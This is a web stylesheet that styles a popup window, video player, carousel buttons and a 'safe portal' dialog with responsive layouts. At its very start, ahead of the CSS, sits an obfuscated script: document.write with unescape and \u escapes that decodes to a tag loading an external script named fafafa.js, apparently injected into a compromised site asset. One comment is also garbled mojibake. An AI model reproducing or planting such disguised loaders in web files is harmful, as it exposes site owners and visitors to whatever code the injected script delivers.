<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script>video {
    width: 100%;
    object-fit: fill;
}

.crc-pub-main .video-js .vjs-big-play-button {
    background: rgba(255, 255, 255, .3);
    border-radius: 100%;
    border: none;
    left: 43%;
    top: 60px;
    width: 1.5em;
}

.swiper-button-prev-open.swiper-button-disabled {
    background: url(/image/crc-open-btn-back-nor.png) no-repeat;
    background-size: cover;
}

.swiper-button-next-open.swiper-button-disabled {
    background: url(/image/crc-open-btn-next-nor.png) no-repeat;
    background-size: cover;
}


.crc-pub-window-pic img {
    width: 100%;
    height: 100%;
}

.crc-pub-window-title {
    white-space: nowrap;
    text-overflow: ellipsis;
    overflow: hidden;
}

.crc-pub-window-icon,
.crc-pub-window-style-,
.crc-pub-window-icon,
.crc-pub-window-video,
.crc-pub-window-pic {
    display: none;
}

/* 茅禄藴猫庐陇pc氓鈥櫯捗幻ヅ犅 */
video {
    width: 100%;
    object-fit: fill;
}

.video-js .vjs-big-play-button {
    display: none;
}

.crc-open-mask {
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, .5);
    left: 0px;
    top: 0px;
    z-index: 1005;
    position: fixed;
    display: none;
}


.crc-pub-window-close {
    width: 36px;
    height: 36px;
    position: absolute;
    right: -10px;
    top: -20px;
}

.crc-pub-window-close img {
    width: 100%;
}

.crc-pub-window-swiper {
    width: 100%;
    height: 250px;
}

.crc-pub-window-wrap {
    height: auto;
}

.crc-pub-window-title {
    height: 40px;
    line-height: 40px;
    border-bottom: 1px dashed #e6e5e5;
    color: #000;
}
.swiper-button-next-open,
.swiper-button-prev-open {
    width: 23px;
    height: 23px;
    text-align: Center;
    line-height: 23px;
    border-radius: 23px;
    color: #ddd;
    background: #fff;
    top: 265px;
    font-weight: bold;
    font-size: 12px;
}
.swiper-button-prev-open {
    left: 260px;
    background: url(/image/crc-open-btn-back-sel.png) no-repeat;
    background-size: cover;
}
.swiper-button-next-open {
    right: 15px;
    background: url(/image/crc-open-btn-next-sel.png) no-repeat;
    background-size: cover;
}
.swiper-button-prev-open.swiper-button-disabled {
    background: url(/image/crc-open-btn-back-nor.png) no-repeat;
    background-size: cover;
    opacity: 1;
}
.swiper-button-next-open.swiper-button-disabled {
    background: url(/image/crc-open-btn-next-nor.png) no-repeat;
    background-size: cover;
    opacity: 1;
}
.crc-pub-window-pic img {
    width: 100%;
    height: 100%;
}
.crc-pub-window-title {
    white-space: nowrap;
    text-overflow: ellipsis;
    overflow: hidden;
}

.crc-pub-window-icon,
.crc-pub-window-style-,
.crc-pub-window-icon,
.crc-pub-window-video,
.crc-pub-window-pic {
    display: none;
}

.crc-pub-window {
    position: fixed;
    left: 50%;
    /* bottom: 92px; */
    bottom: 2vh;
    z-index: 10002;
    width: 1180px;
    height: 794px;
    padding: 60px 40px;
    box-shadow: 0px 0px 15px rgba(0, 0, 0, .15);
    display: none;
    background: url(/image/crc-window-bg1.png);
    background-repeat: no-repeat;
    background-size: 100% auto;
    background-position: top center;
    /* background: #FFFFFF; */
    border-radius: 16px;
    margin-left: -590px;
}



.crc-pub-window  .title-safe-protal{
    height: 40px;
    font-family: MicrosoftYaHei, MicrosoftYaHei;
    font-weight: bold;
    font-size: 30px;
    color: #333333;
    line-height: 40px;
    text-align: justify;
    font-style: normal;
}




.crc-pub-window   .title-safe-contents{
    width: 100%;
    height: 536px;
    box-shadow: 0px 16px 6px 0px rgba(186,249,235,0.1);
    border-radius: 16px;
    border: 1px solid;
    border-image: linear-gradient(180deg, rgba(240, 252, 252, 0), rgba(218, 252, 245, 1)) 1 1;
    margin-top: 50px;
    padding: 40px;
    background: linear-gradient(
        to bottom, 
        rgba(255, 255, 255, 0.6)  0%, 
        rgba(255, 255, 255, 0.8) 50%, 
        rgba(255, 255, 255, 1) 100%
    );
}



.crc-pub-window   .safe-protal-btn-containers{
    width: 140px;
    height: 48px;
    background: #008A7B;
    border-radius: 4px;
    text-align: center;
    float: right;
    margin-top: 30px;
}



.crc-pub-window   .safe-protal-btn-containers  .btn-font{
    font-family: MicrosoftYaHei;
    font-size: 16px;
    color: #FFFFFF;
    line-height: 48px;
    text-align: justify;
    font-style: normal;
}

@media screen and (min-width:1024px) and   (max-width:1180px){
    .crc-pub-window {
        position: fixed;
        left: 16px;
        top: 30px;
        z-index: 10002;
        width: calc(100% - 32px);
        height: 753px;
        padding: 20px 10px;
        box-shadow: 0px 0px 15px rgba(0, 0, 0, .15);
        display: none;
        background: url(/image/crc-window-bg2.png);
        background-repeat: no-repeat;
        background-size: 100% auto;
        background-position: top center;
        border-radius: 16px;
        margin-left: 0;
    }
}


@media screen and (max-width:1024px) {

    .crc-pub-window {
        position: fixed;
        left: 16px;
        bottom: 1.86rem;
        top: auto;
        z-index: 10002;
        width: calc(100% - 32px);
        height: 610px;
        padding: 20px 10px;
        box-shadow: 0px 0px 15px rgba(0, 0, 0, .15);
        display: none;
        background: url(/image/crc-window-bg2.png);
        background-repeat: no-repeat;
        background-size: 100% auto;
        background-position: top center;
        border-radius: 16px;
        margin-left: 0;
    }

    .crc-pub-window .title-safe-protal {
        /* height: 40px; */
        font-family: MicrosoftYaHei, MicrosoftYaHei;
        font-weight: bold;
        font-size: 18px;
        color: #333333;
        line-height: 40px;
        text-align: justify;
        font-style: normal;
    }

    .crc-pub-window   .title-safe-contents{
        width: 100%;
        height: 448px;
        box-shadow: 0px 16px 6px 0px rgba(186,249,235,0.1);
        border-radius: 8px;
        border: 1px solid;
        border-image: linear-gradient(180deg, rgba(240, 252, 252, 0), rgba(218, 252, 245, 1)) 1 1;
        margin-top: 24px;
        padding: .4rem;
        background: linear-gradient(
            to bottom, 
            rgba(255, 255, 255, 0.6)  0%, 
            rgba(255, 255, 255, 0.8) 50%, 
            rgba(255, 255, 255, 1) 100%
        );
    }

    .crc-pub-window .safe-protal-btn-containers {
        width: 100%;
        height: 48px;
        line-height: 48px;
        background: #008A7B;
        border-radius: 4px;
        text-align: center;
        float: none;
        margin-top: .2rem;
    }

    .crc-pub-window .safe-protal-btn-containers .btn-font {
        font-family: MicrosoftYaHei;
        font-size: 14px;
        color: #FFFFFF;
        line-height: inherit;
        text-align: justify;
        font-style: normal;
    }

    
}<!--0.00011587142944336-->